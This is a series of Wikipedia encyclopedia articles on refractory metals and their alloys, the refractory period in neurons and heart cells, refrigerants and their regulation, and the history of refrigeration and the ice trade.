Molybdenum-based alloys are widely used, because they are cheaper than superior tungsten alloys. The most widely used alloy of molybdenum is the T itanium - Z irconium - M olybdenum alloy TZM, composed of 0.5% titanium and 0.08% of zirconium (with molybdenum being the rest). The alloy exhibits a higher creep resistance and strength at high temperatures, making service temperatures of above 1060 °C possible for the material. The high resistivity of Mo-30W, an alloy of 70% molybdenum and 30% tungsten, against the attack of molten zinc makes it the ideal material for casting zinc. It is also used to construct valves for molten zinc. [ 11 ]
Molybdenum is used in mercury wetted reed relays , because molybdenum does not form amalgams and is therefore resistant to corrosion by liquid mercury . [ 12 ] [ 13 ]
Molybdenum is the most commonly used of the refractory metals. Its most important use is as a strengthening alloy of steel . Structural tubing and piping often contains molybdenum, as do many stainless steels . Its strength at high temperatures, resistance to wear and low coefficient of friction are all properties which make it invaluable as an alloying compound. Its excellent anti- friction properties lead to its incorporation in greases and oils where reliability and performance are critical. Automotive constant-velocity joints use grease containing molybdenum. The compound sticks readily to metal and forms a very hard, friction-resistant coating. Most of the world's molybdenum ore can be found in China, the USA , Chile and Canada . [ 14 ] [ 15 ] [ 16 ] [ 17 ]
Tungsten was discovered in 1781 by Swedish chemist Carl Wilhelm Scheele . Tungsten has the highest melting point of all metals, at 3,410 °C (6,170 °F ).
Up to 22% Rhenium is alloyed with tungsten to improve its high temperature strength and corrosion resistance. Thorium as an alloying compound is used when electric arcs have to be established. The ignition is easier and the arc burns more stably than without the addition of thorium. For powder metallurgy applications, binders have to be used for the sintering process. For the production of the tungsten heavy alloy, binder mixtures of nickel and iron or nickel and copper are widely used. The tungsten content of the alloy is normally above 90%. The diffusion of the binder elements into the tungsten grains is low even at the sintering temperatures and therefore the interior of the grains are pure tungsten. [ 18 ]
Tungsten and its alloys are often used in applications where high temperatures are present but still a high strength is necessary and the high density is not troublesome. [ 19 ] Tungsten wire filaments provide the vast majority of household incandescent lighting , but are also common in industrial lighting as electrodes in arc lamps. Lamps get more efficient in the conversion of electric energy to light with higher temperatures and therefore a high melting point is essential for the application as filament in incandescent light. [ 20 ] Gas tungsten arc welding (GTAW, also known as tungsten inert gas (TIG) welding) equipment uses a permanent, non-melting electrode . The high melting point and the wear resistance against the electric arc makes tungsten a suitable material for the electrode. [ 21 ] [ 22 ]
Tungsten's high density and strength are also key properties for its use in weapon projectiles , for example as an alternative to depleted Uranium for tank gun rounds. [ 23 ] Its high melting point makes tungsten a good material for applications like rocket nozzles , for example in the UGM-27 Polaris . [ 24 ] Some of the applications of tungsten are not related to its refractory properties but simply to its density. For example, it is used in balance weights for planes and helicopters or for heads of golf clubs . [ 25 ] [ 26 ] In this applications similar dense materials like the more expensive osmium can also be used.
The most common use for tungsten is as the compound tungsten carbide in drill bits , machining and cutting tools. The largest reserves of tungsten are in China , with deposits in Korea , Bolivia , Australia , and other countries.
It also finds itself serving as a lubricant , antioxidant , in nozzles and bushings, as a protective coating and in many other ways. Tungsten can be found in printing inks, x-ray screens, in the processing of petroleum products, and flame proofing of textiles .
Niobium is nearly always found together with tantalum, and was named after Niobe , the daughter of the mythical Greek king Tantalus for whom tantalum was named. Niobium has many uses, some of which it shares with other refractory metals. It is unique in that it can be worked through annealing to achieve a wide range of strength and ductility , and is the least dense of the refractory metals. It can also be found in electrolytic capacitors and in the most practical superconducting alloys. Niobium can be found in aircraft gas turbines , vacuum tubes and nuclear reactors .
An alloy used for liquid rocket thruster nozzles, such as in the main engine of the Apollo Lunar Modules , is C103, which consists of 89% niobium, 10% hafnium and 1% titanium. [ 27 ] Another niobium alloy was used for the nozzle of the Apollo Service Module . As niobium is oxidized at temperatures above 400 °C, a protective coating is necessary for these applications to prevent the alloy from becoming brittle. [ 27 ]
Tantalum is one of the most corrosion -resistant substances available.
Many important uses have been found for tantalum owing to this property, particularly in the medical and surgical fields, and also in harsh acidic environments. It is also used to make superior electrolytic capacitors. Tantalum films provide the second most capacitance per volume of any substance after Aerogel , [ citation needed ] and allow miniaturization of electronic components and circuitry . Many cellular phones and computers contain tantalum capacitors.
Rhenium is the most recently discovered refractory metal. It is found in low concentrations with many other metals, in the ores of other refractory metals, platinum or copper ores. It is useful as an alloy to other refractory metals, where it adds ductility and tensile strength . Rhenium alloys are being used in electronic components, gyroscopes and nuclear reactors . Rhenium finds its most important use as a catalyst. It is used as a catalyst in reactions such as alkylation , dealkylation , hydrogenation and oxidation . However its rarity makes it the most expensive of the refractory metals. [ 28 ]
The strength and high-temperature stability of refractory metals make them suitable for hot metalworking applications and for vacuum furnace technology. Many special applications exploit these properties: for example, tungsten lamp filaments operate at temperatures up to 3073 K, and molybdenum furnace windings withstand 2273 K.
However, poor low-temperature fabricability and extreme oxidability at high temperatures are shortcomings of most refractory metals. Interactions with the environment can significantly influence their high-temperature creep strength. Application of these metals requires a protective atmosphere or coating.
The refractory metal alloys of molybdenum, niobium, tantalum, and tungsten have been applied to space nuclear power systems. These systems were designed to operate at temperatures from 1350 K to approximately 1900 K. An environment must not interact with the material in question. Liquid alkali metals as the heat transfer fluids are used as well as the ultra-high vacuum .
The high-temperature creep strain of alloys must be limited for them to be used. The creep strain should not exceed 1–2%. An additional complication in studying creep behavior of the refractory metals is interactions with environment, which can significantly influence the creep behavior. | https://en.wikipedia.org/wiki/Refractory_metals |
Refractoriness is the fundamental property of any object of autowave nature (especially excitable medium ) not responding to stimuli, if the object stays in the specific refractory state . In common sense, refractory period is the characteristic recovery time, a period that is associated with the motion of the image point on the left branch of the isocline u ˙ = 0 {\displaystyle {\dot {u}}=0} [ B: 1 ] (for more details, see also Reaction–diffusion and Parabolic partial differential equation ).
In physiology , [ B: 2 ] a refractory period is a period of time during which an organ or cell is incapable of repeating a particular action, or (more precisely) the amount of time it takes for an excitable membrane to be ready for a second stimulus once it returns to its resting state following an excitation. It most commonly refers to electrically excitable muscle cells or neurons. Absolute refractory period corresponds to depolarization and repolarization, whereas relative refractory period corresponds to hyperpolarization.
After initiation of an action potential, the refractory period is defined two ways:
The absolute refractory period coincides with nearly the entire duration of the action potential. In neurons , it is caused by the inactivation of the voltage-gated sodium channels that originally opened to depolarize the membrane. These channels remain inactivated until the membrane hyperpolarizes. The channels then close, de-inactivate, and regain their ability to open in response to stimulus.
The relative refractory period immediately follows the absolute. As voltage-gated potassium channels open to terminate the action potential by repolarizing the membrane, the potassium conductance of the membrane increases dramatically. K + ions moving out of the cell bring the membrane potential closer to the equilibrium potential for potassium. This causes brief hyperpolarization of the membrane, that is, the membrane potential becomes transiently more negative than the normal resting potential. Until the potassium conductance returns to the resting value, a greater stimulus will be required to reach the initiation threshold for a second depolarization. The return to the equilibrium resting potential marks the end of the relative refractory period.
The refractory period in cardiac physiology is related to the ion currents that, in cardiac cells as in nerve cells, flow into and out of the cell freely. The flow of ions translates into a change in the voltage of the inside of the cell relative to the extracellular space. As in nerve cells, this characteristic change in voltage is referred to as an action potential. Unlike that in nerve cells, the cardiac action potential duration is closer to 100 ms (with variations depending on cell type, autonomic tone, etc.). After an action potential initiates, the cardiac cell is unable to initiate another action potential for some duration of time (which is slightly shorter than the "true" action potential duration). This period of time is referred to as the refractory period, which is 250ms in duration and helps to protect the heart.
In the classical sense, the cardiac refractory period is separated into an absolute refractory period and a relative refractory period. During the absolute refractory period, a new action potential cannot be elicited. During the relative refractory period, a new action potential can be elicited under the correct circumstances.
The cardiac refractory period can result in different forms of re-entry , which are a cause of tachycardia . [ 1 ] [ B: 3 ] Vortices of excitation in the myocardium ( autowave vortices ) are a form of re-entry . Such vortices can be a mechanism of life-threatening cardiac arrhythmias . In particular, the autowave reverberator , more commonly referred to as spiral waves or rotors, can be found within the atria and may be a cause of atrial fibrillation .
The refractory period in a neuron occurs after an action potential and generally lasts one millisecond. An action potential consists of three phases.
Phase one is depolarization. During depolarization, voltage-gated sodium ion channels open, increasing the neuron's membrane conductance for sodium ions and depolarizing the cell's membrane potential (from typically -70 mV toward a positive potential). In other words, the membrane is made less negative. After the potential reaches the activation threshold (-55 mV), the depolarization is actively driven by the neuron and overshoots the equilibrium potential of an activated membrane (+30 mV).
Phase two is repolarization. During repolarization, voltage-gated sodium ion channels inactivate (different from the closed state) due to the now-depolarized membrane, and voltage-gated potassium channels activate (open). Both the inactivation of the sodium ion channels and the opening of the potassium ion channels act to repolarize the cell's membrane potential back to its resting membrane potential.
When the cell's membrane voltage overshoots its resting membrane potential (near -60 mV), the cell enters a phase of hyperpolarization. This is due to a larger-than-resting potassium conductance across the cell membrane. This potassium conductance eventually drops and the cell returns to its resting membrane potential.
Recent research has shown that neuronal refractory periods can exceed 20 milliseconds. Furthermore, the relation between hyperpolarization and the neuronal refractory was questioned, as neuronal refractory periods were observed for neurons that do not exhibit hyperpolarization. [ 2 ] [ 3 ] The neuronal refractory period was shown to be dependent on the origin of the input signal to the neuron, as well as the preceding spiking activity of the neuron. [ 3 ]
The refractory periods are due to the inactivation property of voltage-gated sodium channels and the lag of potassium channels in closing. Voltage-gated sodium channels have two gating mechanisms, the activation mechanism that opens the channel with depolarization and the inactivation mechanism that closes the channel with repolarization. While the channel is in the inactive state, it will not open in response to depolarization. The period when the majority of sodium channels remain in the inactive state is the absolute refractory period. After this period, there are enough voltage-activated sodium channels in the closed (active) state to respond to depolarization. However, voltage-gated potassium channels that opened in response to repolarization do not close as quickly as voltage-gated sodium channels; to return to the active closed state. During this time, the extra potassium conductance means that the membrane is at a higher threshold and will require a greater stimulus to cause action potentials to fire. In other words, because the membrane potential inside the axon becomes increasingly negative relative to the outside of the membrane, a stronger stimulus will be required to reach the threshold voltage, and thus, initiate another action potential. This period is the relative refractory period.
The muscle action potential lasts roughly 2–4 ms and the absolute refractory period is roughly 1–3 ms, shorter than other cells. | https://en.wikipedia.org/wiki/Refractory_period_(physiology) |
A refrigerant is a working fluid used in the cooling, heating, or reverse cooling/heating cycles of air conditioning systems and heat pumps , where they undergo a repeated phase transition from a liquid to a gas and back again. Refrigerants are heavily regulated because of their toxicity and flammability , [ 1 ] as well as the contribution of CFC and HCFC refrigerants to ozone depletion [ 2 ] and the contribution of HFC refrigerants to climate change . [ 3 ]
Refrigerants are used in a direct expansion (DX) circulating system to transfer energy from one environment to another, typically from inside a building to outside or vice versa. These can be air conditioner cooling only systems, cooling & heating reverse DX systems, or heat pump and heating only DX cycles. Refrigerants can carry 10 times more energy per kg than water, and 50 times more than air. [ 4 ]
Refrigerants are controlled substances that are classified by several international safety regulations and, depending on their classification, may only be handled by qualified engineers due to extreme pressure , temperature , flammability , and toxicity .
The first air conditioners and refrigerators employed toxic or flammable gases, such as ammonia , sulfur dioxide , methyl chloride , or propane , that could result in fatal accidents when they leaked. [ 5 ]
In 1928 Thomas Midgley Jr. created the first non-flammable, non-toxic chlorofluorocarbon gas, Freon (R-12). The name is a trademark name owned by DuPont (now Chemours ) for any chlorofluorocarbon (CFC), hydrochlorofluorocarbon (HCFC), or hydrofluorocarbon (HFC) refrigerant. Following the discovery of better synthesis methods, CFCs such as R-11 , [ 6 ] R-12 , [ 7 ] R-123 [ 6 ] and R-502 [ 8 ] dominated the market.
In the mid-1970s, scientists discovered that CFCs were causing major damage to the ozone layer that protects the earth from ultraviolet radiation, and to the ozone holes over polar regions. [ 9 ] [ 10 ] This led to the signing of the Montreal Protocol in 1987 which aimed to phase out CFCs and HCFC [ 11 ] but did not address the contributions that HFCs made to climate change. The adoption of HCFCs such as R-22 , [ 12 ] [ 13 ] [ 14 ] and R-123 [ 6 ] was accelerated and so were used in most U.S. homes in air conditioners and in chillers [ 15 ] from the 1980s as they have a dramatically lower Ozone Depletion Potential (ODP) than CFCs, but their ODP was still not zero which led to their eventual phase-out.
Hydrofluorocarbons (HFCs) such as R-134a , [ 16 ] [ 17 ] R-407A , [ 18 ] R-407C , [ 19 ] R-404A , [ 8 ] R-410A [ 20 ] (a 50/50 blend of R-125 / R-32 ) and R-507 [ 21 ] [ 22 ] were promoted as replacements for CFCs and HCFCs in the 1990s and 2000s. HFCs were not ozone-depleting but did have global warming potentials (GWPs) thousands of times greater than CO 2 with atmospheric lifetimes that can extend for decades. This in turn, starting from the 2010s, led to the adoption in new equipment of Hydrocarbon and HFO ( hydrofluoroolefin ) refrigerants R-32, [ 23 ] R-290, [ 24 ] R-600a, [ 24 ] R-454B , [ 25 ] R-1234yf , [ 26 ] [ 27 ] R-514A, [ 28 ] R-744 (CO 2 ), [ 29 ] R-1234ze(E) [ 30 ] and R-1233zd(E) , [ 31 ] which have both an ODP of zero and a lower GWP. Hydrocarbons and CO 2 are sometimes called natural refrigerants because they can be found in nature.
The environmental organization Greenpeace provided funding to a former East German refrigerator company to research alternative ozone- and climate-safe refrigerants in 1992. The company developed a hydrocarbon mixture of propane and isobutane , or pure isobutane, [ 32 ] called "Greenfreeze", but as a condition of the contract with Greenpeace could not patent the technology, which led to widespread adoption by other firms. [ 33 ] [ 34 ] [ 35 ] Policy and political influence by corporate executives resisted change however, [ 36 ] [ 37 ] citing the flammability and explosive properties of the refrigerants, [ 38 ] and DuPont together with other companies blocked them in the U.S. with the U.S. EPA. [ 39 ] [ 40 ]
Beginning on 14 November 1994, the U.S. Environmental Protection Agency restricted the sale, possession and use of refrigerants to only licensed technicians, per rules under sections 608 and 609 of the Clean Air Act. [ 41 ] In 1995, Germany made CFC refrigerators illegal. [ 42 ]
In 1996 Eurammon , a European non-profit initiative for natural refrigerants , was established and comprises European companies, institutions, and industry experts. [ 43 ] [ 44 ] [ 45 ]
In 1997, FCs and HFCs were included in the Kyoto Protocol to the Framework Convention on Climate Change.
In 2000 in the UK, the Ozone Regulations [ 46 ] came into force which banned the use of ozone-depleting HCFC refrigerants such as R22 in new systems. The Regulation banned the use of R22 as a "top-up" fluid for maintenance from 2010 for virgin fluid and from 2015 for recycled fluid. [ citation needed ]
With growing interest in natural refrigerants as alternatives to synthetic refrigerants such as CFCs, HCFCs and HFCs, in 2004, Greenpeace worked with multinational corporations like Coca-Cola and Unilever , and later Pepsico and others, to create a corporate coalition called Refrigerants Naturally!. [ 42 ] [ 47 ] Four years later, Ben & Jerry's of Unilever and General Electric began to take steps to support production and use in the U.S. [ 48 ] It is estimated that almost 75 percent of the refrigeration and air conditioning sector has the potential to be converted to natural refrigerants. [ 49 ]
In 2006, the EU adopted a Regulation on fluorinated greenhouse gases (FCs and HFCs) to encourage to transition to natural refrigerants (such as hydrocarbons). It was reported in 2010 that some refrigerants are being used as recreational drugs , leading to an extremely dangerous phenomenon known as inhalant abuse . [ 50 ]
From 2011 the European Union started to phase out refrigerants with a global warming potential (GWP) of more than 150 in automotive air conditioning (GWP = 100-year warming potential of one kilogram of a gas relative to one kilogram of CO 2 ) such as the refrigerant HFC-134a (known as R-134a in North America) which has a GWP of 1526. [ 51 ] In the same year the EPA decided in favour of the ozone- and climate-safe refrigerant for U.S. manufacture. [ 33 ] [ 52 ] [ 53 ]
A 2018 study by the nonprofit organization " Drawdown " put proper refrigerant management and disposal at the very top of the list of climate impact solutions, with an impact equivalent to eliminating over 17 years of US carbon dioxide emissions. [ 54 ]
In 2019 it was estimated that CFCs, HCFCs, and HFCs were responsible for about 10% of direct radiative forcing from all long-lived anthropogenic greenhouse gases. [ 55 ] and in the same year the UNEP published new voluntary guidelines, [ 56 ] however many countries have not yet ratified the Kigali Amendment .
From early 2020 HFCs (including R-404A, R-134a, and R-410A) are being superseded: Residential air-conditioning systems and heat pumps are increasingly using R-32 . This still has a GWP of more than 600. Progressive devices use refrigerants with almost no climate impact, namely R-290 (propane), R-600a (isobutane), or R-1234yf (less flammable, in cars). In commercial refrigeration also CO 2 (R-744) can be used.
A refrigerant needs to have: a boiling point that is somewhat below the target temperature (although boiling point can be adjusted by adjusting the pressure appropriately), a high heat of vaporization , a moderate density in liquid form, a relatively high density in gaseous form (which can also be adjusted by setting pressure appropriately), and a high critical temperature . Working pressures should ideally be containable by copper tubing , a commonly available material. Extremely high pressures should be avoided. [ citation needed ]
The ideal refrigerant would be: non-corrosive , non-toxic , non-flammable , with no ozone depletion and global warming potential. It should preferably be natural with well-studied and low environmental impact. Newer refrigerants address the issue of the damage that CFCs caused to the ozone layer and the contribution that HCFCs make to climate change, but some do raise issues relating to toxicity and/or flammability. [ 57 ]
With increasing regulations, refrigerants with a very low global warming potential are expected to play a dominant role in the 21st century, [ 58 ] in particular, R-290 and R-1234yf. Starting from almost no market share in 2018, [ 59 ] low GWPO devices are gaining market share in 2022.
Coolant and refrigerants are found throughout the industrialized world, in homes, offices, and factories, in devices such as refrigerators, air conditioners, central air conditioning systems (HVAC), freezers, and dehumidifiers. When these units are serviced, there is a risk that refrigerant gas will be vented into the atmosphere either accidentally or intentionally, hence the creation of technician training and certification programs in order to ensure that the material is conserved and managed safely. Mistreatment of these gases has been shown to deplete the ozone layer and is suspected to contribute to global warming . [ 82 ]
With the exception of isobutane and propane (R600a, R441A, and R290), ammonia and CO 2 under Section 608 of the United States' Clean Air Act it is illegal to knowingly release any refrigerants into the atmosphere. [ 83 ] [ 84 ]
Refrigerant reclamation is the act of processing used refrigerant gas that has previously been used in some type of refrigeration loop such that it meets specifications for new refrigerant gas. In the United States , the Clean Air Act of 1990 requires that used refrigerant be processed by a certified reclaimer, which must be licensed by the United States Environmental Protection Agency (EPA), and the material must be recovered and delivered to the reclaimer by EPA-certified technicians. [ 85 ]
Refrigerants may be divided into three classes according to their manner of absorption or extraction of heat from the substances to be refrigerated: [ citation needed ]
The R- numbering system was developed by DuPont (which owned the Freon trademark), and systematically identifies the molecular structure of refrigerants made with a single halogenated hydrocarbon. ASHRAE has since set guidelines for the numbering system as follows: [ 86 ]
R-X 1 X 2 X 3 X 4
For example, R-134a has 2 carbon atoms, 2 hydrogen atoms, and 4 fluorine atoms, an empirical formula of tetrafluoroethane. The "a" suffix indicates that the isomer is unbalanced by one atom, giving 1,1,1,2-Tetrafluoroethane . R-134 (without the "a" suffix) would have a molecular structure of 1,1,2,2-Tetrafluoroethane.
The same numbers are used with an R- prefix for generic refrigerants, with a "Propellant" prefix (e.g., "Propellant 12") for the same chemical used as a propellant for an aerosol spray , and with trade names for the compounds, such as " Freon 12". Recently, a practice of using abbreviations HFC- for hydrofluorocarbons , CFC- for chlorofluorocarbons , and HCFC- for hydrochlorofluorocarbons has arisen, because of the regulatory differences among these groups. [ citation needed ]
Refrigerants are classified under regulations such as ISO 817/5149, AHRAE 34/15, & BS EN 378. The pressures of these gases can range from 700–1,000 kPa (100–150 psi). They can also be at temperatures as low as −50 °C [−58 °F] and as high as over 100 °C [212 °F]. Refrigerants have varying classifications of flammability : A1 class are non-flammable, A2/A2L class are flammable, and A3 class are extremely flammable and/or explosive . Toxicity also varies; B1 class refrigerants have low toxicity, while B2 refrigerants are moderately toxic and B3 refrigerants are highly toxic. [ citation needed ] These regulations relate to situations where these refrigerants are released into the atmosphere in the event of an accidental leak, not while circulated. [ 87 ] Due to these regulations, most refrigerants may only be handled by qualified/certified engineers for the relevant classes; in the UK, C&G 2079 is required for A1-class refrigerants, while C&G 6187-2 is required for A2, A2L, and A3-class refrigerants. [ citation needed ] Due to their non-flammability, non-explosivity, and non-toxicity, A1 class refrigerants have been used in open systems (where they are consumed when used rather than circulated) like fire extinguishers , inhalers , computer rooms, and insulation since 1928. [ citation needed ]
ASHRAE Standard 34, Designation and Safety Classification of Refrigerants , assigns safety classifications to refrigerants based upon toxicity and flammability . ASHRAE assigns a capital letter to indicate toxicity and a number to indicate flammability. The letter "A" is the least toxic and the number 1 is the least flammable. [ 88 ] | https://en.wikipedia.org/wiki/Refrigerant |
Refrigeration is any of various types of cooling of a space, substance, or system to lower and/or maintain its temperature below the ambient one (while the removed heat is ejected to a place of higher temperature). [ 1 ] [ 2 ] Refrigeration is an artificial, or human-made, cooling method. [ 1 ] [ 2 ]
Refrigeration refers to the process by which energy, in the form of heat, is removed from a low-temperature medium and transferred to a high-temperature medium. [ 3 ] [ 4 ] This work of energy transfer is traditionally driven by mechanical means (whether ice or electromechanical machines), but it can also be driven by heat, magnetism , electricity , laser , or other means. Refrigeration has many applications, including household refrigerators , industrial freezers , cryogenics , and air conditioning . [ 5 ] [ 6 ] [ 7 ] Heat pumps may use the heat output of the refrigeration process, and also may be designed to be reversible, but are otherwise similar to air conditioning units. [ 5 ]
Refrigeration has had a large impact on industry, lifestyle, agriculture, and settlement patterns. [ 8 ] The idea of preserving food dates back to human prehistory , but for thousands of years humans were limited regarding the means of doing so. They used curing via salting and drying , and they made use of natural coolness in caves , root cellars , and winter weather, but other means of cooling were unavailable. In the 19th century, they began to make use of the ice trade to develop cold chains . [ 9 ] In the late 19th through mid-20th centuries, mechanical refrigeration was developed, improved, and greatly expanded in its reach. [ 3 ] Refrigeration has thus rapidly evolved in the past century, from ice harvesting to temperature-controlled rail cars , refrigerator trucks , and ubiquitous refrigerators and freezers in both stores and homes in many countries. The introduction of refrigerated rail cars contributed to the settlement of areas that were not on earlier main transport channels such as rivers, harbors, or valley trails.
These new settlement patterns sparked the building of large cities which are able to thrive in areas that were otherwise thought to be inhospitable, such as Houston , Texas, and Las Vegas , Nevada. In most developed countries, cities are heavily dependent upon refrigeration in supermarkets in order to obtain their food for daily consumption. [ 10 ] The increase in food sources has led to a larger concentration of agricultural sales coming from a smaller percentage of farms. [ 11 ] Farms today have a much larger output per person in comparison to the late 1800s. [ 12 ] [ 11 ] This has resulted in new food sources available to entire populations, which has had a large impact on the nutrition of society.
The seasonal harvesting of snow and ice is an ancient practice estimated to have begun earlier than 1000 BC. [ 13 ] A Chinese collection of lyrics from this time period known as the Sleaping , describes religious ceremonies for filling and emptying ice cellars. However, little is known about the construction of these ice cellars or the purpose of the ice. The next ancient society to record the harvesting of ice may have been the Jews in the book of Proverbs, which reads, "As the cold of snow in the time of harvest, so is a faithful messenger to them who sent him." Historians have interpreted this to mean that the Jews used ice to cool beverages rather than to preserve food. Other ancient cultures such as the Greeks and the Romans dug large snow pits insulated with grass, chaff, or branches of trees as cold storage. Like the Jews, the Greeks and Romans did not use ice and snow to preserve food, but primarily as a means to cool beverages. Egyptians cooled water by evaporation in shallow earthen jars on the roofs of their houses at night. The ancient people of India used this same concept to produce ice. The Persians stored ice in a pit called a Yakhchal and may have been the first group of people to use cold storage to preserve food. In the Australian outback before a reliable electricity supply was available many farmers used a Coolgardie safe , consisting of a box frame with hessian (burlap) sides soaked in water. The water would evaporate and thereby cool the interior air, allowing many perishables such as fruit, butter, and cured meats to be kept. [ 14 ] [ 15 ]
Before 1830, few Americans used ice to refrigerate foods due to a lack of ice-storehouses and iceboxes. As these two things became more widely available, individuals used axes and saws to harvest ice for their storehouses. This method proved to be difficult, dangerous, and certainly did not resemble anything that could be duplicated on a commercial scale. [ 16 ]
Despite the difficulties of harvesting ice, Frederic Tudor thought that he could capitalize on this new commodity by harvesting ice in New England and shipping it to the Caribbean islands as well as the southern states. In the beginning, Tudor lost thousands of dollars, but eventually turned a profit as he constructed icehouses in Charleston, Virginia and in the Cuban port town of Havana. These icehouses as well as better insulated ships helped reduce ice wastage from 66% to 8%. This efficiency gain influenced Tudor to expand his ice market to other towns with icehouses such as New Orleans and Savannah. This ice market further expanded as harvesting ice became faster and cheaper after one of Tudor's suppliers, Nathaniel Wyeth, invented a horse-drawn ice cutter in 1825. This invention as well as Tudor's success inspired others to get involved in the ice trade and the ice industry grew.
Ice became a mass-market commodity by the early 1830s with the price of ice dropping from six cents per pound to a half of a cent per pound. In New York City, ice consumption increased from 12,000 tons in 1843 to 100,000 tons in 1856. Boston's consumption leapt from 6,000 tons to 85,000 tons during that same period. Ice harvesting created a "cooling culture" as majority of people used ice and iceboxes to store their dairy products, fish, meat, and even fruits and vegetables. These early cold storage practices paved the way for many Americans to accept the refrigeration technology that would soon take over the country. [ 17 ] [ 18 ]
The history of artificial refrigeration began when Scottish professor William Cullen designed a small refrigerating machine in 1755. Cullen used a pump to create a partial vacuum over a container of diethyl ether , which then boiled , absorbing heat from the surrounding air. [ 19 ] The experiment even created a small amount of ice, but had no practical application at that time.
In 1758, Benjamin Franklin and John Hadley , professor of chemistry, collaborated on a project investigating the principle of evaporation as a means to rapidly cool an object at Cambridge University , England . They confirmed that the evaporation of highly volatile liquids, such as alcohol and ether, could be used to drive down the temperature of an object past the freezing point of water. They conducted their experiment with the bulb of a mercury thermometer as their object and with a bellows used to quicken the evaporation; they lowered the temperature of the thermometer bulb down to −14 °C (7 °F), while the ambient temperature was 18 °C (65 °F). They noted that soon after they passed the freezing point of water 0 °C (32 °F), a thin film of ice formed on the surface of the thermometer's bulb and that the ice mass was about a 6.4 millimetres ( 1 ⁄ 4 in) thick when they stopped the experiment upon reaching −14 °C (7 °F). Franklin wrote, "From this experiment, one may see the possibility of freezing a man to death on a warm summer's day". [ 20 ] In 1805, American inventor Oliver Evans described a closed vapor-compression refrigeration cycle for the production of ice by ether under vacuum.
In 1820, the English scientist Michael Faraday liquefied ammonia and other gases by using high pressures and low temperatures, and in 1834, an American expatriate to Great Britain, Jacob Perkins , built the first working vapor-compression refrigeration system in the world. It was a closed-cycle that could operate continuously, as he described in his patent:
His prototype system worked although it did not succeed commercially. [ 21 ]
In 1842, a similar attempt was made by American physician, John Gorrie , [ 22 ] who built a working prototype, but it was a commercial failure. Like many of the medical experts during this time, Gorrie thought too much exposure to tropical heat led to mental and physical degeneration, as well as the spread of diseases such as malaria. [ 23 ] He conceived the idea of using his refrigeration system to cool the air for comfort in homes and hospitals to prevent disease. American engineer Alexander Twining took out a British patent in 1850 for a vapour compression system that used ether.
The first practical vapour-compression refrigeration system was built by James Harrison , a British journalist who had emigrated to Australia . His 1856 patent was for a vapour-compression system using ether, alcohol, or ammonia. He built a mechanical ice-making machine in 1851 on the banks of the Barwon River at Rocky Point in Geelong , Victoria , and his first commercial ice-making machine followed in 1854. Harrison also introduced commercial vapour-compression refrigeration to breweries and meat-packing houses, and by 1861, a dozen of his systems were in operation. He later entered the debate of how to compete against the American advantage of unrefrigerated beef sales to the United Kingdom . In 1873 he prepared the sailing ship Norfolk for an experimental beef shipment to the United Kingdom, which used a cold room system instead of a refrigeration system. The venture was a failure as the ice was consumed faster than expected.
The first gas absorption refrigeration system using gaseous ammonia dissolved in water (referred to as "aqua ammonia") was developed by Ferdinand Carré of France in 1859 and patented in 1860. Carl von Linde , an engineer specializing in steam locomotives and professor of engineering at the Technological University of Munich in Germany, began researching refrigeration in the 1860s and 1870s in response to demand from brewers for a technology that would allow year-round, large-scale production of lager ; he patented an improved method of liquefying gases in 1876. [ 24 ] His new process made possible using gases such as ammonia , sulfur dioxide (SO 2 ) and methyl chloride (CH 3 Cl) as refrigerants and they were widely used for that purpose until the late 1920s.
Thaddeus Lowe , an American balloonist, held several patents on ice-making machines. His "Compression Ice Machine" would revolutionize the cold-storage industry. In 1869, he and other investors purchased an old steamship onto which they loaded one of Lowe's refrigeration units and began shipping fresh fruit from New York to the Gulf Coast area, and fresh meat from Galveston, Texas back to New York, but because of Lowe's lack of knowledge about shipping, the business was a costly failure.
In 1842, John Gorrie created a system capable of refrigerating water to produce ice. Although it was a commercial failure, it inspired scientists and inventors around the world. France's Ferdinand Carre was one of the inspired and he created an ice producing system that was simpler and smaller than that of Gorrie. During the Civil War, cities such as New Orleans could no longer get ice from New England via the coastal ice trade. Carre's refrigeration system became the solution to New Orleans' ice problems and, by 1865, the city had three of Carre's machines. [ 25 ] In 1867, in San Antonio, Texas, a French immigrant named Andrew Muhl built an ice-making machine to help service the expanding beef industry before moving it to Waco in 1871. In 1873, the patent for this machine was contracted by the Columbus Iron Works, a company acquired by the W.C. Bradley Co., which went on to produce the first commercial ice-makers in the US.
By the 1870s, breweries had become the largest users of harvested ice. Though the ice-harvesting industry had grown immensely by the turn of the 20th century, pollution and sewage had begun to creep into natural ice, making it a problem in the metropolitan suburbs. Eventually, breweries began to complain of tainted ice. Public concern for the purity of water, from which ice was formed, began to increase in the early 1900s with the rise of germ theory. Numerous media outlets published articles connecting diseases such as typhoid fever with natural ice consumption. This caused ice harvesting to become illegal in certain areas of the country. All of these scenarios increased the demands for modern refrigeration and manufactured ice. Ice producing machines like that of Carre's and Muhl's were looked to as means of producing ice to meet the needs of grocers, farmers, and food shippers. [ 26 ] [ 27 ]
Refrigerated railroad cars were introduced in the US in the 1840s for short-run transport of dairy products, but these used harvested ice to maintain a cool temperature. [ 28 ]
The new refrigerating technology first met with widespread industrial use as a means to freeze meat supplies for transport by sea in reefer ships from the British Dominions and other countries to the British Isles . Although not actually the first to achieve successful transportation of frozen goods overseas (the Strathleven had arrived at the London docks on 2 February 1880 with a cargo of frozen beef, mutton and butter from Sydney and Melbourne [ 29 ] ), the breakthrough is often attributed to William Soltau Davidson , an entrepreneur who had emigrated to New Zealand . Davidson thought that Britain's rising population and meat demand could mitigate the slump in world wool markets that was heavily affecting New Zealand. After extensive research, he commissioned the Dunedin to be refitted with a compression refrigeration unit for meat shipment in 1881. On February 15, 1882, the Dunedin sailed for London with what was to be the first commercially successful refrigerated shipping voyage, and the foundation of the refrigerated meat industry . [ 30 ]
The Times commented "Today we have to record such a triumph over physical difficulties, as would have been incredible, even unimaginable, a very few days ago...". The Marlborough —sister ship to the Dunedin – was immediately converted and joined the trade the following year, along with the rival New Zealand Shipping Company vessel Mataurua , while the German Steamer Marsala began carrying frozen New Zealand lamb in December 1882. Within five years, 172 shipments of frozen meat were sent from New Zealand to the United Kingdom, of which only 9 had significant amounts of meat condemned. Refrigerated shipping also led to a broader meat and dairy boom in Australasia and South America. J & E Hall of Dartford , England outfitted the SS Selembria with a vapor compression system to bring 30,000 carcasses of mutton from the Falkland Islands in 1886. [ 31 ] In the years ahead, the industry rapidly expanded to Australia, Argentina and the United States.
